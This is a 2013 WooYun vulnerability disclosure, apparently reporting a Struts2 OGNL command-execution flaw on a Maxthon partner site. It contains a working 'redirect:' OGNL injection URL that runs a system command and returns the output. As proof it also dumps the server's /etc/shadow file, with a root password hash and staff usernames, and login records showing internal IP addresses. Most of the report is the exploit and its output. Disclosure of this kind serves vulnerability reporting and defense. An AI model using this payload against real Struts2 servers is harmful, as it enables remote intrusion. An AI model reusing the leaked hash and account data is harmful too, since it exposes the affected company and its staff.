当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038313

漏洞标题:傲游某分站第三方框架命令执行漏洞

相关厂商:傲游

漏洞作者: 猪猪侠

提交时间:2013-09-27 01:40

修复时间:2013-11-11 01:40

公开时间:2013-11-11 01:40

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-27: 细节已通知厂商并且等待厂商处理中
2013-09-27: 厂商已经确认,细节仅向厂商公开
2013-10-07: 细节向核心白帽子及相关领域专家公开
2013-10-17: 细节向普通白帽子公开
2013-10-27: 细节向实习白帽子公开
2013-11-11: 细节向公众公开

简要描述:

使用了第三方框架,导致安全隐患。

详细说明:

# 漏洞出处
http://partner.maxthon.com/rnd.action
# 执行命令
http://partner.maxthon.com/?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'/sbin/ifconfig','-a'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

eth0      Link encap:Ethernet  HWaddr 00:0C:29:07:A0:F1  
          inet addr:10.0.16.65  Bcast:10.0.23.255  Mask:255.255.248.0
          inet6 addr: fe80::20c:29ff:fe07:a0f1/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:12559116 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3899410 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1365674528 (1.2 GiB)  TX bytes:1494013973 (1.3 GiB)
eth1      Link encap:Ethernet  HWaddr 00:0C:29:07:A0:FB  
          inet6 addr: fe80::20c:29ff:fe07:a0fb/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2534520 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:184504274 (175.9 MiB)  TX bytes:468 (468.0 b)
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

漏洞证明:

root:$6$fXnmUKPubngrkiuy$30XJ7I5MTqezhasTTC13uwALySkGqVfJZi7.wRj/rb6l9t8v58Ew/zoiOMUCg4mLNBS9rTxWNazEHaKqs1qbb0:15889:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
adm:*:15513:0:99999:7:::
lp:*:15513:0:99999:7:::
sync:*:15513:0:99999:7:::
shutdown:*:15513:0:99999:7:::
halt:*:15513:0:99999:7:::
mail:*:15513:0:99999:7:::
uucp:*:15513:0:99999:7:::
operator:*:15513:0:99999:7:::
games:*:15513:0:99999:7:::
gopher:*:15513:0:99999:7:::
ftp:*:15513:0:99999:7:::
nobody:*:15513:0:99999:7:::
dbus:!!:15889::::::
vcsa:!!:15889::::::
abrt:!!:15889::::::
haldaemon:!!:15889::::::
ntp:!!:15889::::::
saslauth:!!:15889::::::
postfix:!!:15889::::::
sshd:!!:15889::::::
tcpdump:!!:15889::::::
zouyi:!!:15889:0:99999:7:::
songqi:!!:15889:0:99999:7:::
zoufei:!!:15889:0:99999:7:::
yaoxinnan:!!:15889:0:99999:7:::
zengxiaowei:!!:15889:0:99999:7:::
guoluoyao:!!:15889:0:99999:7:::
likailiang:!!:15889:0:99999:7:::
yueqi:!!:15951:0:99999:7:::
yuchunlin:!!:15951:0:99999:7:::


yuchunli pts/2        10.0.16.50       Tue Sep 17 15:57 - 21:12  (05:15)    
yuchunli pts/0        10.0.16.50       Tue Sep 17 15:10 - 17:54  (02:44)    
yuchunli pts/0        10.0.16.50       Mon Sep 16 14:58 - 21:16  (06:18)    
root     pts/2        10.0.8.249       Wed Sep 11 18:38 - 18:45  (00:06)    
yuchunli pts/0        10.0.16.50       Wed Sep 11 18:30 - 21:24  (02:54)    
root     pts/3        10.0.8.249       Wed Sep 11 09:42 - 09:48  (00:05)    
root     pts/3        10.0.8.249       Wed Sep 11 09:40 - 09:42  (00:01)    
root     pts/3        10.0.8.249       Wed Sep 11 09:36 - 09:38  (00:01)    
root     pts/3        10.0.8.249       Wed Sep 11 09:35 - 09:36  (00:00)    
root     pts/3        10.0.8.249       Wed Sep 11 09:35 - 09:35  (00:00)    
root     pts/3        10.0.8.249       Wed Sep 11 09:33 - 09:33  (00:00)    
root     pts/2        10.0.8.249       Wed Sep 11 09:29 - 11:42  (02:13)    
yuchunli pts/0        10.0.16.50       Wed Sep 11 09:18 - 14:21  (05:02)    
yuchunli pts/2        10.0.16.50       Tue Sep 10 16:19 - 16:22  (00:02)    
yuchunli pts/0        10.0.16.50       Fri Sep  6 09:35 - 13:46  (04:10)    
yuchunli pts/2        10.0.16.50       Wed Sep  4 09:43 - 13:17  (03:34)    
yueqi    pts/3        192.168.0.66     Tue Sep  3 10:30 - 10:31  (00:01)    
yuchunli pts/2        10.0.16.50       Tue Sep  3 10:29 - 14:12  (03:43)    
yuchunli pts/3        10.0.16.50       Tue Sep  3 10:25 - 10:26  (00:00)    
root     pts/2        192.168.0.66     Tue Sep  3 10:25 - 10:26  (00:00)    
root     pts/2        192.168.0.66     Tue Sep  3 10:23 - 10:24  (00:01)    
likailia pts/0        10.0.16.50       Fri Aug 30 18:35 - 18:40  (00:05)    
likailia pts/2        10.0.16.50       Fri Aug 30 17:03 - 18:03  (00:59)    
likailia pts/0        10.0.16.50       Thu Aug 29 14:48 - 18:36  (03:47)    
likailia pts/2        10.0.16.50       Wed Aug 28 17:17 - 17:59  (00:42)    
likailia pts/0        10.0.16.50       Tue Aug 27 18:22 - 18:27  (00:05)    
root     pts/0        10.0.8.249       Tue Aug 27 10:43 - 10:44  (00:01)    
likailia pts/2        10.0.16.50       Tue Aug 27 09:46 - 15:32  (05:46)    
likailia pts/0        10.0.16.50       Mon Aug 26 17:39 - 18:18  (00:39)    
likailia pts/0        10.0.16.50       Mon Aug 26 14:24 - 14:24  (00:00)    
root     pts/0        10.0.8.249       Fri Aug 23 18:49 - 18:49  (00:00)    
root     pts/0        10.0.8.249       Fri Aug 23 18:46 - 18:49  (00:02)    
root     pts/1        10.0.8.249       Fri Aug 23 18:28 - 18:29  (00:00)    
root     pts/1        10.0.8.249       Fri Aug 23 18:25 - 18:25  (00:00)    
likailia pts/0        10.0.16.50       Fri Aug 23 18:13 - 18:33  (00:20)    
root     pts/1        10.0.8.249       Fri Aug 23 14:12 - 16:23  (02:11)    
likailia pts/0        10.0.16.50       Fri Aug 23 09:47 - 16:09  (06:22)    
likailia pts/0        10.0.16.50       Thu Aug 22 09:28 - 09:29  (00:00)    
likailia pts/0        10.0.16.50       Wed Aug 21 09:24 - 18:22  (08:57)    
likailia pts/0        10.0.16.50       Thu Jul 25 16:35 - 18:27  (01:52)    
root     pts/0        10.0.8.249       Thu Jul 25 16:15 - 16:22  (00:06)    
root     pts/0        192.168.0.66     Wed Jul 17 14:19 - 14:19  (00:00)    
likailia pts/0        10.0.16.50       Mon Jul 15 15:11 - 17:22  (02:11)    
root     pts/0        10.0.8.249       Wed Jul  3 15:31 - 15:31  (00:00)    
root     pts/0        192.168.0.66     Wed Jul  3 14:53 - 14:54  (00:01)    
likailia pts/0        192.168.0.66     Wed Jul  3 14:47 - 14:47  (00:00)    
root     pts/0        192.168.0.66     Wed Jul  3 14:46 - 14:46  (00:00)    
root     pts/0        192.168.0.66     Wed Jul  3 14:36 - 14:39  (00:02)    
root     tty1                          Wed Jul  3 14:15   still logged in   
reboot   system boot  2.6.32-279.el6.x Wed Jul  3 19:45 - 01:39 (85+05:54)  
root     tty1                          Wed Jul  3 19:43 - down   (00:01)    
reboot   system boot  2.6.32-279.el6.x Wed Jul  3 19:36 - 19:44  (00:08)    
wtmp begins Wed Jul  3 19:36:32 2013

修复方案:

# 更新第三方框架。

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-09-27 13:30

厂商回复:

感谢反馈.

最新状态:

2013-09-27:已修复